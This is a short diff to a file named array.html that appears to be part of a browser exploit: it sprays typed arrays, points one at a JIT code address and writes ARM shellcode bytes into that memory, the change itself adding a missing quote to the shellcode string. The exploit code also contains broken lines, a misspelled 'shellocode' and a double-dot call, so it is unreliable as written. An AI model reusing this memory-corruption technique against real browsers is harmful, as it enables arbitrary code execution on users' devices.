--- a/array.html
+++ b/array.html
@@ -153,7 +153,7 @@ spray[spray_index][typedarray_index+0x38/4]=jitcode_addr-0x18;//addr;
 var jit_index=typedarray_index+0x38/4;
 var typedarray=spray[spray_index];
 var myarr=arrcvs[0];
-var shellcode=\x04\xb0\x2d\xe5\x00\xb0\x8d\xe2\x02\x30\xa0\xe3\x03\x00\xa0\xe1\x00\xd0\x8b\xe2\x00\x08\xbd\xe8\x1e\xff\x2f\xe1";
+var shellcode="\x04\xb0\x2d\xe5\x00\xb0\x8d\xe2\x02\x30\xa0\xe3\x03\x00\xa0\xe1\x00\xd0\x8b\xe2\x00\x08\xbd\xe8\x1e\xff\x2f\xe1";
 for(var i=0;i<shellocode.length;i++){
  myarr[0]=shellcode..charCodeAt(i);
  typedarray[jit_index]+=2;
